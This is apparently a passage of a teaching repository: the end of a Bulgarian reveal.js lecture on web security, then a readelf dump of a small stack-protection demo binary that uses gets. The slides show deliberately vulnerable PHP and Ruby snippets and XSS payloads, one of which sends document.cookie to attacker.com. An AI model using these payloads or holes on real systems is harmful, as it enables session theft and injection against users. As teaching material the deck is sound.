158 |           </section>
159 | 
160 |           <section>
161 |             <h2>Браузърите се сдобиват с памет</h2>
162 | 
163 |             <p class="fragment">Оказва се, че редица проблеми, възникнали при
164 |             използването на TLS, могат да бъдат <strong>заобиколени</strong> и <strong>до
165 |             някаква степен</strong> неутрализирани, посредством „запомняне“ на
166 |               информация за URL в браузъра.</p>
167 |           </section>
168 | 
169 |           <section>
170 |             <h2>HSTS</h2>
171 |             <p class="fragment">Елиминира нуждата от начална връзка по нешифриран канал след първо отваряне на даден URL.</p>
172 |             <p class="fragment">RFC 6797, реализира се чрез Strict-Transport-Security HTTP хедър.</p>
173 |           </section>
174 | 
175 |           <section>
176 |             <h2>HPKP</h2>
177 |             <p class="fragment">Опитва се да заобиколи недостатък на текущата PKI система.</p>
178 |             <p class="fragment">Показва на потребителя грешка в сигурността, ако публичният ключ на даден сайт е променен след последното посещение.</p>
179 |             <p class="fragment">draft-ietf-websec-key-pinning-21, реализира се чрез Public-Key-Pins HTTP хедър.</p>
180 |           </section>
181 | 
182 |           <section>
183 |             <h2>Странични ефекти</h2>
184 |             <p class="fragment">Предишните два уъркараунда имат „прекрасен“ страничен ефект.</p>
185 |             <img class="fragment" src="SuperCookie.jpg">
186 |             <p class="fragment">Позволяват имплементирането на супер бисквитка, чрез която потребителите да могат да бъдат следени.</p>
187 |           </section>
188 |         </section>
189 | 
190 |         <section>
191 |           <section>
192 |             <h1>Често срещани уязвимости</h1>
193 |           </section>
194 | 
195 |           <section>
196 |             <h2>Инжекция</h2>
197 |             <p>Най-разпространената уязвимост според OWASP</p>
198 |             <p>Случва се, когато недоверени данни бъдат подадени на интерпретатор като част от команда.</p>
199 |             <pre class="lang-php"><code>$sql = "SELECT * FROM users WHERE username = '$username';";</code></pre>
200 |             <pre><code class="language-ruby">File.read "/home/application/upload/#{params[:file]}"</code></pre>
201 |             <p>и т.н.</p>
202 |           </section>
203 | 
204 |           <section>
205 |             <p>Избягва се основно чрез позитивна валидация на входните данни, както и използване на ORM.</p>
206 |           </section>
207 | 
208 |           <section>
209 |             <h2>XSS</h2>
210 |             <p>Означава, че трети лица могат да инжектират JS в приложението ви, който след това да се изпълни в браузърите на потребителите.</p>
211 |             <p>Този код се изпълнява от името и с правата на всеки потребител на приложенето.</p>
212 |             <p>Случва се, когато недоверени данни бъдат рендерирани в изгледа.</p>
213 |             <pre><code class="language-php">echo $_GET['comment'];</code></pre>
214 |           </section>
215 | 
216 |           <section>
217 |             <p>Избягва се чрез позитивна валидация на входните данни или автоматично екраниране на HTML таговете.</p>
218 |             <p>В Rails този проблем до голяма степен е решен с екраниране на всички динамични части от View-то.</p>
219 |             <p>В PHP исторически решението беше да се слагат „магически“ кавички.</p>
220 |             <pre><code>СУ \\\\\\\\"Св. Климент Охридски\\\\\\\\"</code></pre>
221 |           </section>
222 | 
223 |           <section>
224 |             <h2>Примери</h2>
225 |             <pre><code>&lt;img src=javascript:alert('Hello')&gt;
226 | &lt;table background="javascript:alert('Hello')"&gt;&lt;/table&gt;</code></pre>
227 |             <pre><code>&lt;script&gt;document.write('&lt;img src="http://www.attacker.com/'
228 |                       + document.cookie + '"&gt;');&lt;/script&gt;</code></pre>
229 |             <pre><code>&lt;div style="background:url('javascript:alert(1)')"&gt;</code></pre>
230 |           </section>
231 | 
232 |           <section>
233 |             <h2>Уязвимости около сесиите</h2>
234 |             <p>HTTP е stateless протокол</p>
235 |             <p>Често обаче потребителите на едно приложение имат състояние, което трябва да бъде пазено по време на навигация между URL-ите</p>
236 |             <p>Най-честото състояние на потребителя е дали е потвърдил самоличността си пред приложението или не.</p>
237 |           </section>
238 | 
239 |           <section>
240 |             <h2>Кражба на сесия</h2>
241 |             <p>Кражбата на сесийната бисквитка на даден потребител позволява да се използва приложението от негово име.</p>
242 |             <p>Ако се използва HTTP, няма как сесийната бисквитка да бъде запазена в тайна от трети лица.</p>
243 |             <p>Ако сайтът е уязвим на XSS, сесийната бисквитка също може да се извлече.</p>
244 |           </section>
245 | 
246 | 
247 |           <section>
248 |             <h2>Фиксация на сесия</h2>
249 |             <p>Генерира се сесиен идентификатор, който се подава на потребителя.</p>
250 |             <p>Когато потребителят евентуално потвърди самоличността си пред приложението, противникът може да изпълнява действия от негово име.</p>
251 |             <p>Тази уязвимост се неутрализира чрез генериране на нов сесиен идентификатор след вход в приложението</p>
252 |           </section>
253 | 
254 |           <section>
255 |             <h2>CSRF</h2>
256 |             <p>Браузърът изпълнява заявка към трети сайт от името на потребителя.</p>
257 |             <p>Ограничава се до някаква степен чрез CORS, както и чрез CSRF token.</p>
258 |           </section>
259 | 
260 |           <section>
261 |             <h2>Clickjacking</h2>
262 |             <p>Почти същото като CSRF, но изисква кликване от потребителя, за да се изпълни действието.</p>
263 |           </section>
264 | 
265 |           <section>
266 |             <h2>Unsafe Redirection</h2>
267 |             <p>Почти същото като CSRF, но изисква кликване от потребителя, за да се изпълни действието.</p>
268 |             <pre><code>redirect_to(params.update(action:'main'))</code></pre>
269 |           </section>
270 | 
271 |           <section>
272 |             <h2>И много други</h2>
273 |           </section>
274 | 
275 | 
276 |         </section>
277 |       </div>
278 | 
279 |     </div>
280 | 
281 |     <script src="lib/js/head.min.js"></script>
282 |     <script src="js/reveal.js"></script>
283 | 
284 |     <script>
285 | 
286 |      // Full list of configuration options available at:
287 |      // https://github.com/hakimel/reveal.js#configuration
288 |      Reveal.initialize({
289 |        controls: false,
290 |        progress: true,
291 |        history: true,
292 |        center: true,
293 | 
294 |        transition: 'slide', // none/fade/slide/convex/concave/zoom
295 | 
296 |        // Optional reveal.js plugins
297 |        dependencies: [
298 |          { src: 'lib/js/classList.js', condition: function() { return !document.body.classList; } },
299 |          { src: 'plugin/markdown/marked.js', condition: function() { return !!document.querySelector( '[data-markdown]' ); } },
300 |          { src: 'plugin/markdown/markdown.js', condition: function() { return !!document.querySelector( '[data-markdown]' ); } },
301 |          { src: 'plugin/highlight/highlight.js', async: true, condition: function() { return !!document.querySelector( 'pre code' ); }, callback: function() { hljs.initHighlightingOnLoad(); } },
302 |          { src: 'plugin/zoom-js/zoom.js', async: true },
303 |          { src: 'plugin/notes/notes.js', async: true }
304 |        ]
305 |      });
306 | 
307 |     </script>
308 | 
309 |   </body>
310 | </html>
311 | 


--------------------------------------------------------------------------------
/code/C/elf-protected:
--------------------------------------------------------------------------------
  1 | ELF Header:
  2 |   Magic:   7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 
  3 |   Class:                             ELF32
  4 |   Data:                              2's complement, little endian
  5 |   Version:                           1 (current)
  6 |   OS/ABI:                            UNIX - System V
  7 |   ABI Version:                       0
  8 |   Type:                              EXEC (Executable file)
  9 |   Machine:                           Intel 80386
 10 |   Version:                           0x1
 11 |   Entry point address:               0x8048340
 12 |   Start of program headers:          52 (bytes into file)
 13 |   Start of section headers:          3828 (bytes into file)
 14 |   Flags:                             0x0
 15 |   Size of this header:               52 (bytes)
 16 |   Size of program headers:           32 (bytes)
 17 |   Number of program headers:         8
 18 |   Size of section headers:           40 (bytes)
 19 |   Number of section headers:         35
 20 |   Section header string table index: 32
 21 | 
 22 | Section Headers:
 23 |   [Nr] Name              Type            Addr     Off    Size   ES Flg Lk Inf Al
 24 |   [ 0]                   NULL            00000000 000000 000000 00      0   0  0
 25 |   [ 1] .interp           PROGBITS        08048134 000134 000013 00   A  0   0  1
 26 |   [ 2] .note.ABI-tag     NOTE            08048148 000148 000020 00   A  0   0  4
 27 |   [ 3] .hash             HASH            08048168 000168 00002c 04   A  4   0  4
 28 |   [ 4] .dynsym           DYNSYM          08048194 000194 000060 10   A  5   1  4
 29 |   [ 5] .dynstr           STRTAB          080481f4 0001f4 000065 00   A  0   0  1
 30 |   [ 6] .gnu.version      VERSYM          0804825a 00025a 00000c 02   A  4   0  2
 31 |   [ 7] .gnu.version_r    VERNEED         08048268 000268 000030 00   A  5   1  4
 32 |   [ 8] .rel.dyn          REL             08048298 000298 000008 08   A  4   0  4
 33 |   [ 9] .rel.plt          REL             080482a0 0002a0 000020 08   A  4  11  4
 34 |   [10] .init             PROGBITS        080482c0 0002c0 00002d 00  AX  0   0  4
 35 |   [11] .plt              PROGBITS        080482f0 0002f0 000050 04  AX  0   0 16
 36 |   [12] .text             PROGBITS        08048340 000340 00025a 00  AX  0   0 16
 37 |   [13] .fini             PROGBITS        0804859c 00059c 000019 00  AX  0   0  4
 38 |   [14] .rodata           PROGBITS        080485b8 0005b8 000008 00   A  0   0  4
 39 |   [15] .eh_frame_hdr     PROGBITS        080485c0 0005c0 000034 00   A  0   0  4
 40 |   [16] .eh_frame         PROGBITS        080485f4 0005f4 0000d0 00   A  0   0  4
 41 |   [17] .ctors            PROGBITS        080496c4 0006c4 000008 00  WA  0   0  4
 42 |   [18] .dtors            PROGBITS        080496cc 0006cc 000008 00  WA  0   0  4
 43 |   [19] .jcr              PROGBITS        080496d4 0006d4 000004 00  WA  0   0  4
 44 |   [20] .dynamic          DYNAMIC         080496d8 0006d8 0000c8 08  WA  5   0  4
 45 |   [21] .got              PROGBITS        080497a0 0007a0 000004 04  WA  0   0  4
 46 |   [22] .got.plt          PROGBITS        080497a4 0007a4 00001c 04  WA  0   0  4
 47 |   [23] .data             PROGBITS        080497c0 0007c0 000008 00  WA  0   0  4
 48 |   [24] .bss              NOBITS          080497c8 0007c8 000008 00  WA  0   0  4
 49 |   [25] .comment          PROGBITS        00000000 0007c8 000022 01  MS  0   0  1
 50 |   [26] .debug_aranges    PROGBITS        00000000 0007f0 000090 00      0   0  8
 51 |   [27] .debug_info       PROGBITS        00000000 000880 0001fe 00      0   0  1
 52 |   [28] .debug_abbrev     PROGBITS        00000000 000a7e 000076 00      0   0  1
 53 |   [29] .debug_line       PROGBITS        00000000 000af4 000143 00      0   0  1
 54 |   [30] .debug_str        PROGBITS        00000000 000c37 000141 01  MS  0   0  1
 55 |   [31] .debug_ranges     PROGBITS        00000000 000d78 000048 00      0   0  8
 56 |   [32] .shstrtab         STRTAB          00000000 000dc0 000133 00      0   0  1
 57 |   [33] .symtab           SYMTAB          00000000 00146c 0004f0 10     34  54  4
 58 |   [34] .strtab           STRTAB          00000000 00195c 00029c 00      0   0  1
 59 | Key to Flags:
 60 |   W (write), A (alloc), X (execute), M (merge), S (strings)
 61 |   I (info), L (link order), G (group), T (TLS), E (exclude), x (unknown)
 62 |   O (extra OS processing required) o (OS specific), p (processor specific)
 63 | 
 64 | There are no section groups in this file.
 65 | 
 66 | Program Headers:
 67 |   Type           Offset   VirtAddr   PhysAddr   FileSiz MemSiz  Flg Align
 68 |   PHDR           0x000034 0x08048034 0x08048034 0x00100 0x00100 R E 0x4
 69 |   INTERP         0x000134 0x08048134 0x08048134 0x00013 0x00013 R   0x1
 70 |       [Requesting program interpreter: /lib/ld-linux.so.2]
 71 |   LOAD           0x000000 0x08048000 0x08048000 0x006c4 0x006c4 R E 0x1000
 72 |   LOAD           0x0006c4 0x080496c4 0x080496c4 0x00104 0x0010c RW  0x1000
 73 |   DYNAMIC        0x0006d8 0x080496d8 0x080496d8 0x000c8 0x000c8 RW  0x4
 74 |   NOTE           0x000148 0x08048148 0x08048148 0x00020 0x00020 R   0x4
 75 |   GNU_EH_FRAME   0x0005c0 0x080485c0 0x080485c0 0x00034 0x00034 R   0x4
 76 |   GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RW  0x10
 77 | 
 78 |  Section to Segment mapping:
 79 |   Segment Sections...
 80 |    00     
 81 |    01     .interp 
 82 |    02     .interp .note.ABI-tag .hash .dynsym .dynstr .gnu.version .gnu.version_r .rel.dyn .rel.plt .init .plt .text .fini .rodata .eh_frame_hdr .eh_frame 
 83 |    03     .ctors .dtors .jcr .dynamic .got .got.plt .data .bss 
 84 |    04     .dynamic 
 85 |    05     .note.ABI-tag 
 86 |    06     .eh_frame_hdr 
 87 |    07     
 88 | 
 89 | Dynamic section at offset 0x6d8 contains 20 entries:
 90 |   Tag        Type                         Name/Value
 91 |  0x00000001 (NEEDED)                     Shared library: [libc.so.6]
 92 |  0x0000000c (INIT)                       0x80482c0
 93 |  0x0000000d (FINI)                       0x804859c
 94 |  0x00000004 (HASH)                       0x8048168
 95 |  0x00000005 (STRTAB)                     0x80481f4
 96 |  0x00000006 (SYMTAB)                     0x8048194
 97 |  0x0000000a (STRSZ)                      101 (bytes)
 98 |  0x0000000b (SYMENT)                     16 (bytes)
 99 |  0x00000015 (DEBUG)                      0x0
100 |  0x00000003 (PLTGOT)                     0x80497a4
101 |  0x00000002 (PLTRELSZ)                   32 (bytes)
102 |  0x00000014 (PLTREL)                     REL
103 |  0x00000017 (JMPREL)                     0x80482a0
104 |  0x00000011 (REL)                        0x8048298
105 |  0x00000012 (RELSZ)                      8 (bytes)
106 |  0x00000013 (RELENT)                     8 (bytes)
107 |  0x6ffffffe (VERNEED)                    0x8048268
108 |  0x6fffffff (VERNEEDNUM)                 1
109 |  0x6ffffff0 (VERSYM)                     0x804825a
110 |  0x00000000 (NULL)                       0x0
111 | 
112 | Relocation section '.rel.dyn' at offset 0x298 contains 1 entries:
113 |  Offset     Info    Type            Sym.Value  Sym. Name
114 | 080497a0  00000306 R_386_GLOB_DAT    00000000   __gmon_start__
115 | 
116 | Relocation section '.rel.plt' at offset 0x2a0 contains 4 entries:
117 |  Offset     Info    Type            Sym.Value  Sym. Name
118 | 080497b0  00000107 R_386_JUMP_SLOT   00000000   gets
119 | 080497b4  00000207 R_386_JUMP_SLOT   00000000   __stack_chk_fail
120 | 080497b8  00000307 R_386_JUMP_SLOT   00000000   __gmon_start__
121 | 080497bc  00000507 R_386_JUMP_SLOT   00000000   __libc_start_main
122 | 
123 | The decoding of unwind sections for machine type Intel 80386 is not currently supported.
124 | 
125 | Symbol table '.dynsym' contains 6 entries:
126 |    Num:    Value  Size Type    Bind   Vis      Ndx Name
127 |      0: 00000000     0 NOTYPE  LOCAL  DEFAULT  UND 
128 |      1: 00000000     0 FUNC    GLOBAL DEFAULT  UND gets@GLIBC_2.0 (2)
129 |      2: 00000000     0 FUNC    GLOBAL DEFAULT  UND __stack_chk_fail@GLIBC_2.4 (3)
130 |      3: 00000000     0 NOTYPE  WEAK   DEFAULT  UND __gmon_start__
131 |      4: 080485bc     4 OBJECT  GLOBAL DEFAULT   14 _IO_stdin_used
132 |      5: 00000000     0 FUNC    GLOBAL DEFAULT  UND __libc_start_main@GLIBC_2.0 (2)
133 | 
134 | Symbol table '.symtab' contains 79 entries:
135 |    Num:    Value  Size Type    Bind   Vis      Ndx Name
136 |      0: 00000000     0 NOTYPE  LOCAL  DEFAULT  UND 
137 |      1: 08048134     0 SECTION LOCAL  DEFAULT    1 
138 |      2: 08048148     0 SECTION LOCAL  DEFAULT    2 
139 |      3: 08048168     0 SECTION LOCAL  DEFAULT    3 
140 |      4: 08048194     0 SECTION LOCAL  DEFAULT    4 
141 |      5: 080481f4     0 SECTION LOCAL  DEFAULT    5 
142 |      6: 0804825a     0 SECTION LOCAL  DEFAULT    6 
143 |      7: 08048268     0 SECTION LOCAL  DEFAULT    7 
144 |      8: 08048298     0 SECTION LOCAL  DEFAULT    8 
145 |      9: 080482a0     0 SECTION LOCAL  DEFAULT    9 
146 |     10: 080482c0     0 SECTION LOCAL  DEFAULT   10 
147 |     11: 080482f0     0 SECTION LOCAL  DEFAULT   11 
148 |     12: 08048340     0 SECTION LOCAL  DEFAULT   12 
149 |     13: 0804859c     0 SECTION LOCAL  DEFAULT   13 
150 |     14: 080485b8     0 SECTION LOCAL  DEFAULT   14 
151 |     15: 080485c0     0 SECTION LOCAL  DEFAULT   15 
152 |     16: 080485f4     0 SECTION LOCAL  DEFAULT   16 
153 |     17: 080496c4     0 SECTION LOCAL  DEFAULT   17 
154 |     18: 080496cc     0 SECTION LOCAL  DEFAULT   18 
155 |     19: 080496d4     0 SECTION LOCAL  DEFAULT   19 
156 |     20: 080496d8     0 SECTION LOCAL  DEFAULT   20 
157 |     21: 080497a0     0 SECTION LOCAL  DEFAULT   21 
158 |     22: 080497a4     0 SECTION LOCAL  DEFAULT   22 
159 |     23: 080497c0     0 SECTION LOCAL  DEFAULT   23 
160 |     24: 080497c8     0 SECTION LOCAL  DEFAULT   24 
161 |     25: 00000000     0 SECTION LOCAL  DEFAULT   25 
162 |     26: 00000000     0 SECTION LOCAL  DEFAULT   26 
163 |     27: 00000000     0 SECTION LOCAL  DEFAULT   27 
164 |     28: 00000000     0 SECTION LOCAL  DEFAULT   28 
165 |     29: 00000000     0 SECTION LOCAL  DEFAULT   29 
166 |     30: 00000000     0 SECTION LOCAL  DEFAULT   30 
167 |     31: 00000000     0 SECTION LOCAL  DEFAULT   31 
168 |     32: 00000000     0 FILE    LOCAL  DEFAULT  ABS init.c
169 |     33: 00000000     0 FILE    LOCAL  DEFAULT  ABS crtstuff.c
170 |     34: 080496c4     0 OBJECT  LOCAL  DEFAULT   17 __CTOR_LIST__
171 |     35: 080496cc     0 OBJECT  LOCAL  DEFAULT   18 __DTOR_LIST__
172 |     36: 080496d4     0 OBJECT  LOCAL  DEFAULT   19 __JCR_LIST__
173 |     37: 08048380     0 FUNC    LOCAL  DEFAULT   12 deregister_tm_clones
174 |     38: 080483b0     0 FUNC    LOCAL  DEFAULT   12 register_tm_clones
175 |     39: 080483f0     0 FUNC    LOCAL  DEFAULT   12 __do_global_dtors_aux
176 |     40: 080497c8     1 OBJECT  LOCAL  DEFAULT   24 completed.5978
177 |     41: 080497cc     4 OBJECT  LOCAL  DEFAULT   24 dtor_idx.5980
178 |     42: 08048450     0 FUNC    LOCAL  DEFAULT   12 frame_dummy
179 |     43: 00000000     0 FILE    LOCAL  DEFAULT  ABS crtstuff.c
180 |     44: 080496c8     0 OBJECT  LOCAL  DEFAULT   17 __CTOR_END__
181 |     45: 080486c0     0 OBJECT  LOCAL  DEFAULT   16 __FRAME_END__
182 |     46: 080496d4     0 OBJECT  LOCAL  DEFAULT   19 __JCR_END__
183 |     47: 08048570     0 FUNC    LOCAL  DEFAULT   12 __do_global_ctors_aux
184 |     48: 00000000     0 FILE    LOCAL  DEFAULT  ABS stack-protection.c
185 |     49: 00000000     0 FILE    LOCAL  DEFAULT  ABS 
186 |     50: 080496c4     0 NOTYPE  LOCAL  DEFAULT   17 __init_array_end
187 |     51: 080496d8     0 OBJECT  LOCAL  DEFAULT   20 _DYNAMIC
188 |     52: 080496c4     0 NOTYPE  LOCAL  DEFAULT   17 __init_array_start
189 |     53: 080497a4     0 OBJECT  LOCAL  DEFAULT   22 _GLOBAL_OFFSET_TABLE_
190 |     54: 08048560     2 FUNC    GLOBAL DEFAULT   12 __libc_csu_fini
191 |     55: 00000000     0 NOTYPE  WEAK   DEFAULT  UND _ITM_deregisterTMCloneTab
192 |     56: 08048370     4 FUNC    GLOBAL HIDDEN    12 __x86.get_pc_thunk.bx
193 |     57: 080497c0     0 NOTYPE  WEAK   DEFAULT   23 data_start
194 |     58: 00000000     0 FUNC    GLOBAL DEFAULT  UND gets@@GLIBC_2.0
195 |     59: 080497c8     0 NOTYPE  GLOBAL DEFAULT   23 _edata
196 |     60: 0804859c     0 FUNC    GLOBAL DEFAULT   13 _fini
197 |     61: 00000000     0 FUNC    GLOBAL DEFAULT  UND __stack_chk_fail@@GLIBC_2
198 |     62: 080496d0     0 OBJECT  GLOBAL HIDDEN    18 __DTOR_END__
199 |     63: 080497c0     0 NOTYPE  GLOBAL DEFAULT   23 __data_start
200 |     64: 00000000     0 NOTYPE  WEAK   DEFAULT  UND __gmon_start__
201 |     65: 080497c4     0 OBJECT  GLOBAL HIDDEN    23 __dso_handle
202 |     66: 080485bc     4 OBJECT  GLOBAL DEFAULT   14 _IO_stdin_used
203 |     67: 00000000     0 FUNC    GLOBAL DEFAULT  UND __libc_start_main@@GLIBC_
204 |     68: 080484f0    97 FUNC    GLOBAL DEFAULT   12 __libc_csu_init
205 |     69: 080497d0     0 NOTYPE  GLOBAL DEFAULT   24 _end
206 |     70: 08048340     0 FUNC    GLOBAL DEFAULT   12 _start
207 |     71: 080485b8     4 OBJECT  GLOBAL DEFAULT   14 _fp_hw
208 |     72: 080497c8     0 NOTYPE  GLOBAL DEFAULT   24 __bss_start
209 |     73: 080484af    53 FUNC    GLOBAL DEFAULT   12 main
210 |     74: 00000000     0 NOTYPE  WEAK   DEFAULT  UND _Jv_RegisterClasses
211 |     75: 080497c8     0 OBJECT  GLOBAL HIDDEN    23 __TMC_END__
212 |     76: 00000000     0 NOTYPE  WEAK   DEFAULT  UND _ITM_registerTMCloneTable
213 |     77: 08048480    47 FUNC    GLOBAL DEFAULT   12 user_read
214 |     78: 080482c0     0 FUNC    GLOBAL DEFAULT   10 _init
215 | 
216 | Histogram for bucket list length (total of 3 buckets):
217 |  Length  Number     % of total  Coverage
218 |       0  0          (  0.0%)
219 |       1  2          ( 66.7%)     40.0%
220 |       2  0          (  0.0%)     40.0%
221 |       3  1          ( 33.3%)    100.0%
222 | 
223 | Version symbols section '.gnu.version' contains 6 entries:
224 |  Addr: 000000000804825a  Offset: 0x00025a  Link: 4 (.dynsym)
225 |   000:   0 (*local*)       2 (GLIBC_2.0)     3 (GLIBC_2.4)     0 (*local*)    
226 |   004:   1 (*global*)      2 (GLIBC_2.0)  
227 | 
228 | Version needs section '.gnu.version_r' contains 1 entries:
229 |  Addr: 0x0000000008048268  Offset: 0x000268  Link: 5 (.dynstr)
230 |   000000: Version: 1  File: libc.so.6  Cnt: 2
231 |   0x0010:   Name: GLIBC_2.4  Flags: none  Version: 3
232 |   0x0020:   Name: GLIBC_2.0  Flags: none  Version: 2
233 | 
234 | Notes at offset 0x00000148 with length 0x00000020:
235 |   Owner                 Data size	Description
236 |   GNU                  0x00000010	NT_GNU_ABI_TAG (ABI version tag)
237 |     OS: Linux, ABI: 2.6.32
238 | 


--------------------------------------------------------------------------------